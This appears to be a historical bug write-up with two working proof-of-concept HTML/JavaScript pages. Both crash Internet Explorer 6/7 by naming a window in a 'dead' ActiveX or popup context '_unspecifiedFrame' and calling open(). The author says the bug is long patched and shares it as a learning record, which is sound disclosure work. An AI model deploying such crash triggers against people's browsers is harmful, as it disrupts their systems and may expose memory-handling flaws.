Renaming an object window inside a dead htmlFile ActiveX to _unspecifiedFrame and then calling open() on it crashes IE. The name _unspecifiedFrame is apparently an internal sentinel value, and calling open() without arguments on a window with that name triggers a code path that crashes.
Version using htmlFile ActiveX:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<TITLE>_unspecifiedFrame Crash</TITLE></HEAD>
<BODY>
<FONT SIZE="2" FACE="Verdana">
<B>Another IE6/7 Crash: if you call me "<FONT COLOR="BLUE">_unspecifiedFrame</FONT>" I will die for you :P</B><BR><BR>
1) Create an ActiveXObject("htmlFile") inside an IFRAME (ifr).<BR><BR>
2) Save a pointer (actX) to the ActiveX <U>outside the IFRAME</U>.<BR><BR>
3) Change the URL of the IFRAME killing (in theory) the ActiveXObject.<BR><BR>
4) Write an OBJECT TYPE="text/html"(popByPass) inside the "dead" ActiveX.<BR><BR>
5) Change the name of the OBJECT (window) to <B>_unspecifiedFrame</B><BR><BR>
6) Call the open() method without parameters and... Crash! :|<BR><BR>
<INPUT TYPE="BUTTON" VALUE="Click Here to CrashMe" ONCLICK="openIt()">
<IFRAME NAME="ifr" STYLE="display:none;"></IFRAME>
<SCRIPT LANGUAGE="JavaScript">
ifr.execScript('parent.actX=new ActiveXObject("htmlFile");')
ifr.location.replace('about:blank');
function writeIt(){
actX.write('<OBJECT ID="popByPass" WIDTH=10 HEIGHT=10 DATA="favicon.ico" TYPE="text/html"></OBJECT>');
actX.close();
// setTimeout('openIt()',1000);
}
function openIt(){
// If we change it to a different name, it won't crash.
actX.all.popByPass.object.parentWindow.name="_unspecifiedFrame";
actX.all.popByPass.object.parentWindow.open();
}
setTimeout('writeIt()',1000);
</SCRIPT>
</BODY>
</HTML>Variation using createPopup:
<iframe name="createPopup_Container"></iframe>
<script language="JavaScript">
function retCode(m){m+='';return m=m.substring(m.indexOf('{')+1,m.lastIndexOf('}'));}
function popUpCode()
{
var objectWindow;
function writeObjectAfterWeLeaveThePage()
{
try
{
var myParentDocument=parent.document;
setTimeout('writeObjectAfterWeLeaveThePage()',100);
}
catch(e)
{
document.body.innerHTML='<object id="myObj" type="text/html" data="no_file_required.html"></object>';
setTimeout('waitObjectToBeReady()',100);
}
}
function waitObjectToBeReady()
{
try
{
objectWindow=document.all.myObj.object.parentWindow;
openWindow();
}
catch(e)
{
setTimeout('waitObjectToBeReady()',100);
}
}
function openWindow()
{
// If you comment the next line or if you use a different name other than _unspecifiedFrame, it won't Crash.
objectWindow.execScript('window.name="_unspecifiedFrame"');
objectWindow.open();
}
writeObjectAfterWeLeaveThePage();
}
createPopup_Container.document.write('<iframe src="nofile.html" width="100" height="100"></iframe>');
createPopup_Container.document.close();
var myPop=createPopup_Container.createPopup().document;
myPop.body.innerHTML='.<script defer="defer">'+retCode(popUpCode)+'<\/script>';
myPop.parentWindow.myPop=myPop;
setTimeout('createPopup_Container.location.replace("http://www.altavista.com/")',3000);
</script>The string _unspecifiedFrame is used internally by IE to identify frames that haven’t been given an explicit name. Using it as an actual window name collides with that internal use, and calling open() without arguments on such a window triggers an unguarded code path.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.